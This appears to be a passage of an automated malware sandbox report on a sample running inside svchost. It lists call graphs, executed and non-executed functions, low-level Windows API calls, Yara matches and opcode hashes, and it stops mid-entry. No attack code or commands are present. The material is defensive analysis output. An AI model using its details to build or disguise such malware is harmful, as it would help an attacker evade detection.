42ed29 95384->95385 95396 4073f3 95385->95396 95387 42ed3f 95395 401939 95387->95395 95399 41ba73 95387->95399 95389 42ed5e 95390 42ed73 95389->95390 95391 42d493 ExitProcess 95389->95391 95410 428c63 95390->95410 95391->95390 95393 42ed8d 95394 42d493 ExitProcess 95393->95394 95394->95395 95398 407400 95396->95398 95414 416e03 95396->95414 95398->95387 95400 41ba9f 95399->95400 95425 41b963 95400->95425 95403 41bae4 95407 42d0d3 NtClose 95403->95407 95408 41bb00 95403->95408 95404 41bacc 95405 41bad7 95404->95405 95406 42d0d3 NtClose 95404->95406 95405->95389 95406->95405 95409 41baf6 95407->95409 95408->95389 95409->95389 95411 428cc5 95410->95411 95413 428cd2 95411->95413 95436 418fc3 95411->95436 95413->95393 95415 416e20 95414->95415 95417 416e39 95415->95417 95418 42db23 95415->95418 95417->95398 95420 42db3d 95418->95420 95419 42db6c 95419->95417 95420->95419 95421 42c723 LdrInitializeThunk 95420->95421 95422 42dbc9 95421->95422 95423 42f153 RtlFreeHeap 95422->95423 95424 42dbe2 95423->95424 95424->95417 95426 41b97d 95425->95426 95430 41ba59 95425->95430 95431 42c7c3 95426->95431 95429 42d0d3 NtClose 95429->95430 95430->95403 95430->95404 95432 42c7dd 95431->95432 95435 32735c0 LdrInitializeThunk 95432->95435 95433 41ba4d 95433->95429 95435->95433 95437 418fed 95436->95437 95443 4194eb 95437->95443 95444 4145e3 95437->95444 95439 41911a 95440 42f153 RtlFreeHeap 95439->95440 95439->95443 95441 419132 95440->95441 95442 42d493 ExitProcess 95441->95442 95441->95443 95442->95443 95443->95413 95448 4145f1 95444->95448 95446 41466c 95446->95439 95447 414662 95447->95439 95448->95446 95449 41bd83 RtlFreeHeap LdrInitializeThunk 95448->95449 95449->95447

                                                                      Executed Functions

                                                                      Function 00418153 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 197 418153-41816f 198 418177-41817c 197->198 199 418172 call 42fd33 197->199 200 418182-418190 call 430333 198->200 201 41817e-418181 198->201 199->198 204 4181a0-4181b1 call 42e7d3 200->204 205 418192-41819d call 4305d3 200->205 210 4181b3-4181c7 LdrLoadDll 204->210 211 4181ca-4181cd 204->211 205->204 210->211
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004181C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction ID: 633108fe4a20d12e7fe595a1a5a3ddb606de6311ecacd7af92866602d4060141
                                                                      • Opcode Fuzzy Hash: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction Fuzzy Hash: C30175B2E0010DB7DF10DBE1DC42FDEB3789B54308F0041AAE90897240FA34EB458B95
                                                                      Function 0042D0D3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 223 42d0d3-42d10f call 4046f3 call 42e2f3 NtClose
                                                                      APIs
                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042D10A
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction ID: 6349b41faa8d104575ad15ea66f78f4238bb9b11001270b56071bbc4c56fa462
                                                                      • Opcode Fuzzy Hash: 9a07b63f02d8e796ddfdb53e18b4c4dc38963cf0b6de78ec5b5ab501614c7820
                                                                      • Instruction Fuzzy Hash: A8E086316002147BD110EB5AEC01FDB776CEFC6710F004419FA0877242C6B57A0187F4
                                                                      Function 03272B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 237 3272b60-3272b6c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b025d77a62f11f1eed1e72328b4ee612aa43932efe92562fd581d1c1ce5a9e6b
                                                                      • Instruction ID: c7c6ad0d887ab70681d3940a12e824ee390e4210c3010d7f8b001f408adcd377
                                                                      • Opcode Fuzzy Hash: b025d77a62f11f1eed1e72328b4ee612aa43932efe92562fd581d1c1ce5a9e6b
                                                                      • Instruction Fuzzy Hash: 54900261213404035105B2584454656400B87E0301B95C021E2014598DC62589D16125
                                                                      Function 03272DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1bf2e23e992389d684ef805eb616a84f4230a3a988c937a80146f9fe93ede7d5
                                                                      • Instruction ID: 08c92f790d007ad213cf6d198576e32fdb5c158c7133fcdbee90ef2e3630f501
                                                                      • Opcode Fuzzy Hash: 1bf2e23e992389d684ef805eb616a84f4230a3a988c937a80146f9fe93ede7d5
                                                                      • Instruction Fuzzy Hash: C890023121240813E111B2584544747000A87D0341FD5C412A142455CD97568A92A121
                                                                      Function 03272C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 238 3272c70-3272c7c LdrInitializeThunk
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 19b4e0b6c3751859fcd04150ef890eec8e677e08b3c5e7009f258429284b7542
                                                                      • Instruction ID: 01a00796c32192788de56d093a3e7aa9b4512993e278b59e7f07e8cd41b973a8
                                                                      • Opcode Fuzzy Hash: 19b4e0b6c3751859fcd04150ef890eec8e677e08b3c5e7009f258429284b7542
                                                                      • Instruction Fuzzy Hash: 5290023121248C02E110B258844478A000687D0301F99C411A542465CD879589D17121
                                                                      Function 032735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c6d2d24d0db3aa230777b4b6dc25a546a83c3edb711e036764e12e59dc01656c
                                                                      • Instruction ID: ab8cde747b1b756ad01261f2889df7f3f53fa2455326dc5a8d6216f9f210b343
                                                                      • Opcode Fuzzy Hash: c6d2d24d0db3aa230777b4b6dc25a546a83c3edb711e036764e12e59dc01656c
                                                                      • Instruction Fuzzy Hash: 7690023161650802E100B2584554746100687D0301FA5C411A142456CD87958A9165A2
                                                                      Function 0041494B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 41494b-41494c 1 4149cd-4149e1 0->1 2 41494e-41496a 0->2 3 414a03-414a08 1->3 4 4149e3-4149f4 PostThreadMessageW 1->4 4->3 5 4149f6-414a00 4->5 5->3
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 5H87$721e5H878$721e5H878
                                                                      • API String ID: 1836367815-1489328907
                                                                      • Opcode ID: fdbbf161827c6f767d32cabc59dbd208bfc05dc68352a7902a397133cf9176c8
                                                                      • Instruction ID: 3f605fd16debac9c66f54adbc8d6abf79e3e635aaca56c7d0f8750ed1924bdaa
                                                                      • Opcode Fuzzy Hash: fdbbf161827c6f767d32cabc59dbd208bfc05dc68352a7902a397133cf9176c8
                                                                      • Instruction Fuzzy Hash: 5CF0E931B4521875EB218A909C41BEEF778DF81B50F40419BEA04AB140D7B155058795
                                                                      Function 0041496B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 721e5H878$721e5H878
                                                                      • API String ID: 1836367815-873499857
                                                                      • Opcode ID: 3314f233b8daac2975d4ad0def9b7a7b13c4934144ca131cb88065f4bc5abff1
                                                                      • Instruction ID: 63d5e1e3fc330f9fbd7032c630ef110b967b5a36bdfea62c1cdb53ab18a5a30d
                                                                      • Opcode Fuzzy Hash: 3314f233b8daac2975d4ad0def9b7a7b13c4934144ca131cb88065f4bc5abff1
                                                                      • Instruction Fuzzy Hash: 4C11DB31E8025875DB21A6A1CC02FDF7F7C9F81754F548169FE047B281E6B8560787EA
                                                                      Function 00414973 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 20 414973-414983 21 41498c-4149e1 call 42fc03 call 418153 call 404663 call 425873 20->21 22 414987 call 42f1f3 20->22 31 414a03-414a08 21->31 32 4149e3-4149f4 PostThreadMessageW 21->32 22->21 32->31 33 4149f6-414a00 32->33 33->31
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(721e5H878,00000111,00000000,00000000), ref: 004149F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID: 721e5H878$721e5H878
                                                                      • API String ID: 1836367815-873499857
                                                                      • Opcode ID: e21c261d1a47e07bba5776479b39645046a2ef673df4aeebd1e31fbadc9bbd74
                                                                      • Instruction ID: 557cc803b3c01f60bdafb351f374e3597fd824c2159f93913bf22df86915f1db
                                                                      • Opcode Fuzzy Hash: e21c261d1a47e07bba5776479b39645046a2ef673df4aeebd1e31fbadc9bbd74
                                                                      • Instruction Fuzzy Hash: 0C01DB31E4035876DB21A6A18C02FDF7B7C5F81B54F408069FE047B2C1E6B8560787E9
                                                                      Function 004181F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 34 4181f3 35 4181f5-418205 34->35 36 4181c5-4181c7 LdrLoadDll 35->36 37 418207-418214 35->37 38 4181ca-4181cd 36->38 39 41821a-418229 37->39 39->39 40 41822b-41822e 39->40 40->35 41 418230-418270 40->41 41->36 41->37
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004181C5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID: j
                                                                      • API String ID: 2234796835-2137352139
                                                                      • Opcode ID: fb286ee3766578796f74731f95f74484118e6b255d4df453717fb1e3e10f850a
                                                                      • Instruction ID: 6ced835e839dd839df220f9f2947c7c814bc0126b665532f51af8840255d92cd
                                                                      • Opcode Fuzzy Hash: fb286ee3766578796f74731f95f74484118e6b255d4df453717fb1e3e10f850a
                                                                      • Instruction Fuzzy Hash: BFE02B37580449EFCB11DDB8C582899B361EB95B3076403C9E85D4B689CB77AC4E874A
                                                                      Function 0042D3F3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 213 42d3f3-42d437 call 4046f3 call 42e2f3 RtlAllocateHeap
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(?,0041EF2E,?,?,00000000,?,0041EF2E,?,?,?), ref: 0042D432
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction ID: 09dd84127039a9d52dff1d70642511c976807b249c4408bc88f3ff0c4ac5e3fb
                                                                      • Opcode Fuzzy Hash: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction Fuzzy Hash: 18E06DB1200214BFD710EE99EC41F9B37ADEFC5710F004419F908A7241D6B5B91087B8
                                                                      Function 0042D443 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 218 42d443-42d487 call 4046f3 call 42e2f3 RtlFreeHeap
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,04C483C8,00000007,00000000,00000004,00000000,004179C7,000000F4), ref: 0042D482
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction ID: f6de4437b133a1ac129fa0d7b7dff93352f69e6a50dbd1a9d2a9ee316e6e9284
                                                                      • Opcode Fuzzy Hash: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction Fuzzy Hash: 20E06D71204214BBD614EE99DC41E9B33ACEFC5710F000419F909A7241D775B91087B9
                                                                      Function 0042D493 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 228 42d493-42d4cc call 4046f3 call 42e2f3 ExitProcess
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,B7A2F3AD,?,?,B7A2F3AD), ref: 0042D4C7
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2578577901.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 6dd1fcf5dd1af0fda2152ff7e0dbaa7079de7d627a55fec9f36786b8ae35a334
                                                                      • Instruction ID: 1c4ddca568f19f0abcd5889a5007a7f8654b46b2af34716467b0874434781022
                                                                      • Opcode Fuzzy Hash: 6dd1fcf5dd1af0fda2152ff7e0dbaa7079de7d627a55fec9f36786b8ae35a334
                                                                      • Instruction Fuzzy Hash: 78E08671604214BBD110EA5ADC01F97775CDFC5714F50841AFA09A7242C6B5790187F4
                                                                      Function 03272C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 233 3272c0a-3272c0f 234 3272c11-3272c18 233->234 235 3272c1f-3272c26 LdrInitializeThunk 233->235
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ddf7df053cb033a80d889b007025d13a7489c61b1d11ef926f86cbf702ff4bdb
                                                                      • Instruction ID: 8466f779504b5f1cafda1f469c5c32e8834b0409aa59219549dcaadebe4b4433
                                                                      • Opcode Fuzzy Hash: ddf7df053cb033a80d889b007025d13a7489c61b1d11ef926f86cbf702ff4bdb
                                                                      • Instruction Fuzzy Hash: D7B09B719125D5C5EA11F7604608717790577E0701F5AC465D3030645E4739C1D1E175

                                                                      Non-executed Functions

                                                                      Function 0327096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 03272DF0: LdrInitializeThunk.NTDLL ref: 03272DFA
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270BA3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270BB6
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270D60
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03270D74
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 1404860816-0
                                                                      • Opcode ID: e73986b18dc171c0cfdad3d73b6c045494a24ba842e73cb35f46c5d728584251
                                                                      • Instruction ID: f9d8f0158add07b13046e7d9dc5ecc8f170b72bf400123070320cf22355f4b7f
                                                                      • Opcode Fuzzy Hash: e73986b18dc171c0cfdad3d73b6c045494a24ba842e73cb35f46c5d728584251
                                                                      • Instruction Fuzzy Hash: 00424C75920715DFDB61CF28C880BAAB7F5FF44314F1485AAE989DB241D770AA84CFA0
                                                                      Function 03274340 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: db1f535bb89c5d336865e12d595bc1a1a182b071483d0242fa1d010813156277
                                                                      • Instruction ID: 7ded69b200e0fa3a520095e092d354cea950e029d2d9aa94011139d43d490d6a
                                                                      • Opcode Fuzzy Hash: db1f535bb89c5d336865e12d595bc1a1a182b071483d0242fa1d010813156277
                                                                      • Instruction Fuzzy Hash: 3A90023161680412A140B25848C4586400697E0301B95C011E142455CC8B148A965361
                                                                      Function 03274650 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9220b5404d26921ea5f20835cad07062a107be8ac51a6a7134db3fed0fa842e9
                                                                      • Instruction ID: 048902a242d67cae18913502e246d8c5898791e3ca341058417db9e9ae1f7cda
                                                                      • Opcode Fuzzy Hash: 9220b5404d26921ea5f20835cad07062a107be8ac51a6a7134db3fed0fa842e9
                                                                      • Instruction Fuzzy Hash: 38900261612504425140B2584844446600697E13013D5C115A1554568C871889959269
                                                                      Function 03272BA0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 19ff5b3126dc32b96f15b1a23e8c53ce7f09b5421a664bb469f7c3a6b37a75c3
                                                                      • Instruction ID: bc9accecedfdd98ada8ea08629dede1af0a3f2c9d9fbd1172ac32dace9bd06d5
                                                                      • Opcode Fuzzy Hash: 19ff5b3126dc32b96f15b1a23e8c53ce7f09b5421a664bb469f7c3a6b37a75c3
                                                                      • Instruction Fuzzy Hash: 9090023161640C02E150B2584454786000687D0301F95C011A102465CD87558B9576A1
                                                                      Function 03272B80 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 537b0f8f159a357ac9456fec242540c74a74c8b781a72c6509a54cf9e5edbd6a
                                                                      • Instruction ID: c034fcc46f503689c68bb38355bb2a771afbbf8c154d9616e452c90b8cc731a0
                                                                      • Opcode Fuzzy Hash: 537b0f8f159a357ac9456fec242540c74a74c8b781a72c6509a54cf9e5edbd6a
                                                                      • Instruction Fuzzy Hash: 6A90023121240C02E104B25848446C6000687D0301F95C011A702465DE976589D17131
                                                                      Function 03272BE0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aaefac259a29df7180d0cf00794016d2b996cb2dc09485b952e13acc56dd2b07
                                                                      • Instruction ID: 88974a77f0cbebc3464e8229b0d04f090b8d0272c32e7e2d87a304b026109825
                                                                      • Opcode Fuzzy Hash: aaefac259a29df7180d0cf00794016d2b996cb2dc09485b952e13acc56dd2b07
                                                                      • Instruction Fuzzy Hash: 5E90023121644C42E140B2584444A86001687D0305F95C011A106469CD97258E95B661
                                                                      Function 03272BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0b9b22d83725d32a7258191ad4fbdf66494e9bbdef1e8d892260adf606e90d3
                                                                      • Instruction ID: 4aef2f8a9420fb87cbe2a381ad362ef75d93a4d7728c68c9caf6531cb7bbf149
                                                                      • Opcode Fuzzy Hash: b0b9b22d83725d32a7258191ad4fbdf66494e9bbdef1e8d892260adf606e90d3
                                                                      • Instruction Fuzzy Hash: 7E90023121240C02E180B258444468A000687D1301FD5C015A102565CDCB158B9977A1
                                                                      Function 03272AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c887387774d3828f5242ca9c320e0a4997fcc59b383e564d26b6195cd0cfc80e
                                                                      • Instruction ID: ac0c1d6bb55c1fa0056f5d883e8eff144b3fb8b4911d2420c35330249c65676a
                                                                      • Opcode Fuzzy Hash: c887387774d3828f5242ca9c320e0a4997fcc59b383e564d26b6195cd0cfc80e
                                                                      • Instruction Fuzzy Hash: 449002A1212544925500F3588444B4A450687E0301B95C016E2054568CC62589919135
                                                                      Function 03272AF0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9ee17d8d375f5773837d19f697d342fac76fbc87650532198b6ca233cceb30b6
                                                                      • Instruction ID: 915b05f2a9dd9b542d2f3ef1f0408b345ce280ed6ebc1ad2a383eeade6d560cd
                                                                      • Opcode Fuzzy Hash: 9ee17d8d375f5773837d19f697d342fac76fbc87650532198b6ca233cceb30b6
                                                                      • Instruction Fuzzy Hash: 36900225232404021145F658064454B044697D63513D5C015F2416598CC72189A55321
                                                                      Function 03272AD0 Relevance: .0, Instructions: 4COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2579237033.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_3200000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9fd8441668ae3f6f6763315a7d4882743a9f0a410057e24c8f134e15350c322c
                                                                      • Instruction ID: caed76c3d16eb8978d9dfb8c574c745c05a9f14dde67d4ab48c94ca9e20b275d
                                                                      • Opcode Fuzzy Hash: 9fd8441668ae3f6f6763315a7d4882743a9f0a410057e24c8f134e15350c322c
